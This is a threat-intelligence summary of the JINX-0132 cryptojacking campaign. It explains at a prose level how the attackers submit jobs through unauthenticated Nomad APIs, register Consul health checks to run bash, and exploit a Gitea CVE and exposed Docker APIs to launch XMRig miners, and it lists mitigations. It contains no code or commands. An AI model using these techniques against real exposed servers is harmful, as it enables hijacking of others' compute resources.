Introduction
Researchers have identified a threat group named JINX-0132 that is exploiting misconfigured HashiCorp Nomad deployments and other DevOps tools as attack vectors for cryptojacking [5]. This campaign is significant as it represents one of the first documented instances of Nomad misconfigurations being exploited in the wild.
Description
Researchers have identified a threat group named JINX-0132 that is exploiting misconfigured HashiCorp Nomad deployments [5], along with other DevOps tools like Docker and Gitea, as an attack vector for cryptojacking [5]. This campaign is particularly notable as it marks one of the first documented instances of Nomad misconfigurations being exploited in the wild. JINX-0132 targets publicly accessible DevOps web servers [3], including exposed HashiCorp Nomad applications [3], and is known to manage hundreds of clients, with the CPU and memory resources of these instances potentially incurring costs of tens of thousands of dollars per month. Approximately 25% of cloud environments utilize these technologies [4] [5], with 5% directly exposed to the internet [4] [5], and 30% of those deployments misconfigured [5], creating significant vulnerabilities for attackers.
JINX-0132 leverages Nomad’s job queue feature [5], which allows users to submit tasks to nodes registered with the Nomad server [5]. The default open configuration of Nomad’s job scheduling API permits any user with access to the Nomad server API to create and execute jobs, potentially leading to remote code execution (RCE) on the server and connected nodes [5]. Attackers exploit these exposed APIs to deploy multiple malicious jobs with seemingly random names within a consistent task group called “NIGNOG” on compromised hosts to download and execute the XMRig miner, which connects to a public Monero mining pool using an attacker-controlled wallet address [3]. This automation of attacks enables JINX-0132 to initiate mining operations with minimal effort once a misconfigured instance is identified [4].
Additionally, JINX-0132 is abusing the health check service in Consul to execute bash commands and run XMRig payloads [5]. Without proper access control lists (ACLs) or security features enabled [5], any user with remote access can register services and health checks [5], facilitating RCE [5]. The group is also exploiting CVE-2020-14144 in older versions of Gitea and misconfigured Docker Engine API versions [5], allowing them to create containers that launch crypto-miner images [5]. Reports indicate that there are over 5,300 exposed Consul servers and more than 400 exposed Nomad servers worldwide, with significant concentrations in countries such as China, the United States, Germany, Singapore [2], Finland [2], the Netherlands, and the United Kingdom. Some compromised servers had significant compute power [1], which could incur substantial costs for the organizations affected.
To mitigate these risks [1] [3] [5], it is crucial to implement best practices when deploying Nomad [3], particularly by enabling ACLs and job security features to deny unauthenticated access to the Jobs feature, thereby preventing unauthorized execution of malicious payloads [3]. Additionally, keeping Gitea instances updated [5], enabling security features in Consul [5], and avoiding binding the Docker API to 0.0.0.0 or exposing it to the internet are recommended measures to enhance security and protect against such exploitation.
Conclusion
The activities of JINX-0132 highlight the critical need for robust security measures in DevOps environments. The exploitation of misconfigured Nomad deployments and other tools underscores the potential financial and operational impacts on organizations. Implementing best practices [3], such as enabling ACLs, updating software, and securing APIs, is essential to mitigate these risks [1]. As the landscape of cyber threats evolves, continuous vigilance and proactive security measures will be vital in safeguarding against such sophisticated attacks.
References
[1] https://securityonline.info/jinx-0132-cryptojackers-exploit-misconfigured-devops-environments/
[2] https://siberulak.com/cryptokacking-kampanyasi-githubdan-hazir-araclari-kullanarak-devops-apileri-kullaniyor/
[3] https://www.wiz.io/blog/jinx-0132-cryptojacking-campaign
[4] https://undercodenews.com/hackers-exploit-misconfigured-hashicorp-nomad-in-first-ever-attack-campaign/
[5] https://www.infosecurity-magazine.com/news/cryptojacking-campaign-devops/
